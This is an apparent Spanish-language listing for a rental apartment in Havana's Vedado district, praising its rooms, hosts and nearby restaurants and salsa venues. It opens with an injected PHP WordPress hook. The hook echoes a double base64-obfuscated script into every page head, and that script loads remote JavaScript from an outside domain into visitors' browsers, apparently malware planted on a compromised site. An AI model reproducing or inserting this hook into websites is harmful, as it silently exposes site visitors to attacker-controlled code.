function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 );
El apartamento de Yanela y Ariel es muy espacioso, tiene muy definida sus áreas y espacios abiertos, se compensan decoraciones clásicas y tradicionales. Se ubica en una zona tranquila del Vedado, cercano de Tropiflora, Heladería Calzada y 12 para la distracción de los niños y familiares, Restaurante La Catedral, muy cerca del acceso a Internet – Wifi que ofrece el Círculo Social José Antonio Echeverría, además de eventos, piscina y más de la cultura cubana.
El apartamento es muy confortable, cerca del malecón habanero y el restaurante 1830, debido a su ubicación podrá acceder a los sitios más concurridos e históricos de la ciudad fácilmente.
El mismo se describe en:
La profesionalidad y la humildad distinguen a los anfitriones de este apartamento, que ofrecen una espacio cálido para descansar en la zona más tranquila y moderna del Vedado.
Quiere aprender a bailar salsa cubana, o como le llamamos ¨casino, visite el Restaurante 1830 y sus peñas culturales, ver vídeo al final.